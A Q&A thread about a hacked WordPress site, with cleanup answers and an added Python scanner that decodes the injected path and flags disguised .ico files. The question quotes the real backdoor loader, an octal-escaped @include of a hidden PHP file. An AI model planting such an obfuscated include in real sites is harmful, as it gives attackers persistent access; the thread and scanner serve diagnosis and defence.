Krishna Sunuwar

Reputation: 2947

WordPress site hacked?

It looks like my WordPress site has been hacked. The following code snippet was in index.php, wp-config.php

<?php
/*6b9bb*/

@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";

/*6b9bb*/

I have changed:

  1. WP Admin URL and put a strong password and username
  2. Changed cPanel/FTP password to a strong one
  3. Implemented iThemes Security
  4. Updated WordPress to latest (themes and plugins)

However, the code appeared again. What would be good solutions?

P.S. I am using SiteGround.

Thanks

Upvotes: 2

Views: 4120

Answers (3)

user14905706

Reputation:

I faced this problem too, and step by step I did the steps below:

  • Cleaning the injected code, manually
  • Changing all the passwords
  • Hiding the WP admin dashboard URL
  • Limiting the login attempts
  • Installing security plugins (Sucuri, Wordfence security)
  • Contracting with a Sucuri plan

The good thing is to install the Wordfence Security plugin and run the scan; then you will detect all the files with the injected code and you can clean the injected code manually. You can also visit this link too: https://naderzad.info/web-development/wordpress-code-injection/

Upvotes: 1

Beatroot

Reputation: 476

Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. You'll have to replace all files with fresh downloads. Mostly it's straightforward:

  • Back up the whole installation (just in case)
  • Download the complete wp-content/uploads folder
  • Make a screenshot or save the page with the currently active plugins
  • Delete ALL files
  • Get a fresh WordPress setup and extract it
  • Download a fresh copy of your theme and child theme (recreate the previous setup)
  • Copy the previous wp-config.php to this fresh install, but take a GOOD look at it. Usually it also has some virus/backdoors in it, usually easy to see and remove. Now you're already connected with your DB
  • Examine the saved uploads folder for files that shouldn't be there, like PHP files. Then upload it to the new folder
  • Reinstall all plugins, fresh downloads

Upvotes: 2

ArtCore7

Reputation: 133

Yeah, someone is including a .ico file (open it with a text editor, and you will see it is some PHP code and no real ico file)

/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico

Somehow, despite your changes of host and passwords, your hacker is able to get in. Once they are in, they can set up all sorts of backdoors to keep access; any .php file of theirs can do this. At the moment, closing the initial front door they use is your sole occupation.

Follow the advice in this article: https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress

Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/

Upvotes: 8
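
As an added example (not part of the original posts or of any tool named in them), this Python script decodes the escape-encoded include path from the question, which yields the path quoted in the answer above, and scans a downloaded copy of a site for the same two indicators: escape-obfuscated include targets in .php files and .ico files that contain PHP. The function names and the scan root are assumptions.

```python
import re
from pathlib import Path

# Escapes PHP expands inside double quotes: \NNN (octal) and \xHH (hex).
ESCAPE = re.compile(r"\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})")
# include/require (optionally @-silenced) of a double-quoted string literal.
INCLUDE = re.compile(r'(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"')

# Constructed sample: the injected lines exactly as quoted in the question.
SAMPLE = r'''<?php
/*6b9bb*/

@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";

/*6b9bb*/
'''

def decode_php_escapes(literal):
    """Expand octal/hex escapes the way PHP does in a double-quoted string."""
    def expand(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)  # PHP wraps values above \377
        return chr(int(m.group(2), 16))
    return ESCAPE.sub(expand, literal)

def hidden_includes(php_source):
    """Decoded targets of includes whose path literal is escape-encoded."""
    return [decode_php_escapes(m.group(1))
            for m in INCLUDE.finditer(php_source) if ESCAPE.search(m.group(1))]

def is_php_in_disguise(data):
    """True if a file named like an icon lacks the ICO header and carries PHP."""
    return not data.startswith(b"\x00\x00\x01\x00") and b"<?php" in data.lower()

def scan(root):
    """Walk a site copy; return (path, finding) pairs for both indicators."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        if path.suffix == ".php":
            text = path.read_text(errors="replace")
            findings += [(str(path), "include -> " + t) for t in hidden_includes(text)]
        elif path.suffix == ".ico" and is_php_in_disguise(path.read_bytes()):
            findings.append((str(path), "PHP code in .ico file"))
    return findings

if __name__ == "__main__":
    print(hidden_includes(SAMPLE))
```

Run `scan()` against a downloaded copy of the site rather than the live web root, so the files being inspected cannot change during the check.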
